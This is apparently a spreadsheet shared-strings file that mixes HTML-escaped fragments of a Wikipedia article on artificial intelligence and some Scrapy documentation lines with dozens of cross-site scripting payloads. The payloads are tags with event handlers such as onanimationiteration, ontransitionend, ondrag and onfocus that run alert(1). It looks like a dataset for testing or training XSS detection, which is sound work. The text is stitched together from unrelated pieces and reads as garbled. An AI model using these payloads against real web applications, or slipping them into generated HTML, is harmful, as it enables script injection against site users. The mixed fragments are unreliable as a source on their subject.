    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Planning </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Knowledge_representation_and_reasoning" title="Knowledge representation and reasoning"&gt;Knowledge representation and reasoning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onpointerleave=alert(1)&gt;XSS&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;span class="rst-current-version" data-toggle="rst-current-version"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;noframes style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;rb id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;strong id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Fitness_landscape" title="Fitness landscape"&gt;Fitness landscape &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;ul&gt;&lt;li id="n-mainpage-description"&gt;&lt;a href="/wiki/Main_Page" title="Visit the main page [z]" accesskey="z"&gt;Main page &lt;/a&gt; &lt;/li&gt;&lt;li id="n-contents"&gt;&lt;a href="/wiki/Wikipedia:Contents" title="Guides to browsing Wikipedia"&gt;Contents &lt;/a&gt; &lt;/li&gt;&lt;li id="n-featuredcontent"&gt;&lt;a href="/wiki/Wikipedia:Featured_content" title="Featured content – the best of Wikipedia"&gt;Featured content &lt;/a&gt; &lt;/li&gt;&lt;li id="n-currentevents"&gt;&lt;a href="/wiki/Portal:Current_events" title="Find background information on current events"&gt;Current events &lt;/a&gt; &lt;/li&gt;&lt;li id="n-randompage"&gt;&lt;a href="/wiki/Special:Random" title="Load a random article [x]" accesskey="x"&gt;Random article &lt;/a&gt; &lt;/li&gt;&lt;li id="n-sitesupport"&gt;&lt;a href="https://donate.wikimedia.org/wiki/Special:FundraiserRedirector?utm_source=donate&amp;amp;utm_medium=sidebar&amp;amp;utm_campaign=C13_en.wikipedia.org&amp;amp;uselang=en" title="Support us"&gt;Donate to Wikipedia &lt;/a&gt; &lt;/li&gt;&lt;li id="n-shoplink"&gt;&lt;a href="//shop.wikimedia.org" title="Visit the Wikipedia store"&gt;Wikipedia store &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=23" title="Edit section: Computational intelligence and soft computing"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;option onload=alert(1)&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-48"&gt;&lt;a href="#Philosophy_and_ethics"&gt;&lt;span class="tocnumber"&gt;8 </t>
  </si>
  <si>
    <t>&lt;isindex draggable="true" ondragleave="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;blockquote ondragover=alert(1) contenteditable&gt;drop here&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-21"&gt;&lt;a href="#Sub-symbolic"&gt;&lt;span class="tocnumber"&gt;5.3 </t>
  </si>
  <si>
    <t>&lt;header onbeforecopy="alert(1)" contenteditable&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;noembed id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Software_quality" title="Software quality"&gt;Software quality &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;isindex oncut="alert(1)" contenteditable&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;dialog draggable="true" ondragstart="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;summary onpointerdown=alert(1)&gt;XSS&lt;/summary&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:Overfitted_Data.png" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;The blue line could be an example of &lt;a href="/wiki/Overfitting" title="Overfitting"&gt;overfitting &lt;/a&gt; a linear function due to random noise. &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;em id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/em&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;mark ondrop=alert(1) contenteditable&gt;drop here&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;canvas draggable="true" ondragend="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=SearchERP&amp;amp;rft.atitle=Oracle+CEO+Mark+Hurd+sees+no+reason+to+fear+ERP+AI&amp;amp;rft_id=https%3A%2F%2Fsearcherp.techtarget.com%2Fnews%2F252460208%2FOracle-CEO-Mark-Hurd-sees-no-reason-to-fear-ERP-AI&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Physical_symbol_system_hypothesis-353"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Physical_symbol_system_hypothesis_353-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;content onmousemove="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;param onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/param&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-7"&gt;&lt;a href="#Planning"&gt;&lt;span class="tocnumber"&gt;4.3 </t>
  </si>
  <si>
    <t>&lt;div id="mw-indicator-pp-autoreview" class="mw-indicator"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/List_of_fictional_robots_and_androids" title="List of fictional robots and androids"&gt;Fictional robots &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onmouseup="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Human-based_evolutionary_computation" title="Human-based evolutionary computation"&gt;Human-based evolutionary computation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="versioning.html"&gt;Versioning and API Stability&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p onpointerenter=alert(1)&gt;XSS&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophical_zombie" title="Philosophical zombie"&gt;Zombie &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ol id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/ol&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Rowinski, Dan (15 January 2013). &lt;a rel="nofollow" class="external text" href="http://readwrite.com/2013/01/15/virtual-personal-assistants-the-future-of-your-smartphone-infographic"&gt;"Virtual Personal Assistants &amp;amp; The Future Of Your Smartphone &amp;#91;Infographic&amp;#93;" &lt;/a&gt;. &lt;i&gt;ReadWrite &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151222083034/http://readwrite.com/2013/01/15/virtual-personal-assistants-the-future-of-your-smartphone-infographic"&gt;Archived &lt;/a&gt; from the original on 22 December 2015. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=ReadWrite&amp;amp;rft.atitle=Virtual+Personal+Assistants+%26+The+Future+Of+Your+Smartphone+%5BInfographic%5D&amp;amp;rft.date=2013-01-15&amp;amp;rft.au=Rowinski%2C+Dan&amp;amp;rft_id=http%3A%2F%2Freadwrite.com%2F2013%2F01%2F15%2Fvirtual-personal-assistants-the-future-of-your-smartphone-infographic&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20070810233856/http://www-formal.stanford.edu/jmc/mcchay69.html"&gt;Archived &lt;/a&gt; from the original on 10 August 2007&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 August </t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;Automated planning and scheduling &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;menuitem style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;acronym ondragover=alert(1) contenteditable&gt;drop here&lt;/acronym&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;div id="siteSub" class="noprint"&gt;From Wikipedia, the free encyclopedia &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;marquee draggable="true" ondrag="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;em oncontextmenu="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;audio id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onmouseleave="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a class="mw-selflink selflink"&gt;Artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;applet onpointermove=alert(1)&gt;XSS&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Future_of_Life_Institute" title="Future of Life Institute"&gt;Future of Life Institute &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dialog ondrop=alert(1) contenteditable&gt;drop here&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 3 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onmouseleave="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dl style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Algorithm" title="Algorithm"&gt;Algorithms &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;article id=x tabindex=1 onactivate=alert(1)&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFGladwell2005"&gt;Gladwell 2005 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;audio onpointerdown=alert(1)&gt;XSS&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Resistive_random-access_memory" title="Resistive random-access memory"&gt;RRAM &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg onbeforecopy="alert(1)" contenteditable&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Classifications &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;map onpointermove=alert(1)&gt;XSS&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The traditional problems (or goals) of AI research include &lt;a href="/wiki/Automated_reasoning" title="Automated reasoning"&gt;reasoning &lt;/a&gt;, &lt;a href="/wiki/Knowledge_representation" class="mw-redirect" title="Knowledge representation"&gt;knowledge representation &lt;/a&gt;, &lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;planning &lt;/a&gt;, &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;learning &lt;/a&gt;, &lt;a href="/wiki/Natural_language_processing" title="Natural language processing"&gt;natural language processing &lt;/a&gt;, &lt;a href="/wiki/Machine_perception" title="Machine perception"&gt;perception &lt;/a&gt; and the ability to move and manipulate objects.&lt;sup id="cite_ref-Problems_of_AI_15-1" class="reference"&gt;&lt;a href="#cite_note-Problems_of_AI-15"&gt;&amp;#91;15&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Artificial_general_intelligence" title="Artificial general intelligence"&gt;General intelligence &lt;/a&gt; is among the field's long-term goals.&lt;sup id="cite_ref-General_intelligence_19-0" class="reference"&gt;&lt;a href="#cite_note-General_intelligence-19"&gt;&amp;#91;19&amp;#93; &lt;/a&gt; &lt;/sup&gt; Approaches include &lt;a href="#Statistical"&gt;statistical methods &lt;/a&gt;, &lt;a href="#Sub-symbolic"&gt;computational intelligence &lt;/a&gt;, and &lt;a href="#Symbolic"&gt;traditional symbolic AI &lt;/a&gt;. Many tools are used in AI, including versions of &lt;a href="#Search_and_optimization"&gt;search and mathematical optimization &lt;/a&gt;, &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural networks &lt;/a&gt;, and &lt;a href="#Probabilistic_methods_for_uncertain_reasoning"&gt;methods based on statistics, probability and economics &lt;/a&gt;. The AI field draws upon &lt;a href="/wiki/Computer_science" title="Computer science"&gt;computer science &lt;/a&gt;, &lt;a href="/wiki/Information_engineering_(field)" title="Information engineering (field)"&gt;information engineering &lt;/a&gt;, &lt;a href="/wiki/Mathematics" title="Mathematics"&gt;mathematics &lt;/a&gt;, &lt;a href="/wiki/Psychology" title="Psychology"&gt;psychology &lt;/a&gt;, &lt;a href="/wiki/Linguistics" title="Linguistics"&gt;linguistics &lt;/a&gt;, &lt;a href="/wiki/Philosophy" title="Philosophy"&gt;philosophy &lt;/a&gt;, and many other fields.</t>
  </si>
  <si>
    <t>&lt;colgroup id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/colgroup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;audio onbeforecut="alert(1)" contenteditable&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;h1 draggable="true" ondrag="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFWeizenbaum1976" class="citation book"&gt;&lt;a href="/wiki/Joseph_Weizenbaum" title="Joseph Weizenbaum"&gt;Weizenbaum, Joseph &lt;/a&gt; (1976). &lt;a href="/wiki/Computer_Power_and_Human_Reason" title="Computer Power and Human Reason"&gt;&lt;i&gt;Computer Power and Human Reason &lt;/i&gt; &lt;/a&gt;. San Francisco: W.H. Freeman &amp;amp; Company. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-7167-0464-5" title="Special:BookSources/978-0-7167-0464-5"&gt;&lt;bdi&gt;978-0-7167-0464-5 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Computer+Power+and+Human+Reason&amp;amp;rft.place=San+Francisco&amp;amp;rft.pub=W.H.+Freeman+%26+Company&amp;amp;rft.date=1976&amp;amp;rft.isbn=978-0-7167-0464-5&amp;amp;rft.aulast=Weizenbaum&amp;amp;rft.aufirst=Joseph&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;abbr onpointerover=alert(1)&gt;XSS&lt;/abbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">       &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;time onbeforecut="alert(1)" contenteditable&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.economist.com/news/business/21732125-tech-giants-are-investing-billions-transformative-technology-google-leads-race"&gt;"Google leads in the race to dominate artificial intelligence" &lt;/a&gt;. &lt;i&gt;The Economist &lt;/i&gt;. 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;12 March </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;command ondrop=alert(1) contenteditable&gt;drop here&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Automotive"&gt;Automotive </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Property_dualism" title="Property dualism"&gt;Property dualism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;rt id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;applet onclick="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a rel="nofollow" class="external text" href="https://dl.acm.org/citation.cfm?id=3204480.3186697"&gt;Retrieved July 29 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;dt onmouseover="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:Didrachm_Phaistos_obverse_CdM.jpg" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;Silver &lt;a href="/wiki/Didrachma" class="mw-redirect" title="Didrachma"&gt;didrachma &lt;/a&gt; from &lt;a href="/wiki/Crete" title="Crete"&gt;Crete &lt;/a&gt; depicting &lt;a href="/wiki/Talos" title="Talos"&gt;Talos &lt;/a&gt;, an ancient mythical &lt;a href="/wiki/Automaton" title="Automaton"&gt;automaton &lt;/a&gt; with artificial intelligence &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;nextid draggable="true" ondrag="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onkeyup="alert(1)" contenteditable&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;body draggable="true" ondragleave="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/dialog&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg onpointerenter=alert(1)&gt;XSS&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;p id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onmouseup="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;rt onmousemove="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;input3 onpointerout=alert(1)&gt;XSS&lt;/input3&gt;</t>
  </si>
  <si>
    <t>&lt;meta onclick="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onbeforepaste="alert(1)" contenteditable&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;if a move "forks" to create two threats at once, play that move. Otherwise, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;map onmouseout="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;462–644, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;frameset id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onkeydown="alert(1)" contenteditable&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn more by playing with a pre-made Scrapy project.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dt style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-311"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-311"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Science_studies" title="Science studies"&gt;Science studies &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;"The Belief Calculus and Uncertain Reasoning", Yen-Teh Hsia </t>
  </si>
  <si>
    <t>&lt;footer oncut="alert(1)" contenteditable&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mind%E2%80%93body_dualism" title="Mind–body dualism"&gt;Mind–body dualism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=37" title="Edit section: Automotive"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;q id=x tabindex=1 onfocus=alert(1)&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;b onmousedown="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;script style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;tr id=x tabindex=1 onactivate=alert(1)&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Immanuel_Kant" title="Immanuel Kant"&gt;Immanuel Kant &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;slot onpointermove=alert(1)&gt;XSS&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Concept_and_object" title="Concept and object"&gt;Concept and object &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onmousedown="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;table id=x tabindex=1 onfocus=alert(1)&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Network_scheduler" title="Network scheduler"&gt;Network scheduler &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Use the &lt;a class="reference external" href="https://docs.python.org/3/reference/compound_stmts.html#async" title="(in Python v3.8)"&gt;&lt;span class="xref std std-ref"&gt;coroutine syntax</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Software-defined_radio" title="Software-defined radio"&gt;Software-defined radio &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dd style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;blockquote id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-148"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-148"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;rt id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;sup id="cite_ref-132" class="reference"&gt;&lt;a href="#cite_note-132"&gt;&amp;#91;129&amp;#93; &lt;/a&gt; &lt;/sup&gt; </t>
  </si>
  <si>
    <t>&lt;a oncopy="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;li onload=alert(1)&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onpointerleave=alert(1)&gt;XSS&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;cite oncontextmenu="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=52" title="Edit section: Devaluation of humanity"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/telnetconsole.html"&gt;&lt;span class="doc"&gt;Telnet Console</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt; Later published as&lt;br /&gt;&lt;cite class="citation book"&gt;Solomonoff, Ray (1957). "An Inductive Inference Machine". &lt;i&gt;IRE Convention Record &lt;/i&gt;. Section on Information Theory, part 2. pp.&amp;#160;56–62. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=An+Inductive+Inference+Machine&amp;amp;rft.btitle=IRE+Convention+Record&amp;amp;rft.pages=56-62&amp;amp;rft.date=1957&amp;amp;rft.aulast=Solomonoff&amp;amp;rft.aufirst=Ray&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=ACM+Computing+Classification+System%3A+Artificial+intelligence&amp;amp;rft.pub=ACM&amp;amp;rft.date=1998&amp;amp;rft_id=http%3A%2F%2Fwww.acm.org%2Fclass%2F1998%2FI.2.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;em style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/em&gt;</t>
  </si>
  <si>
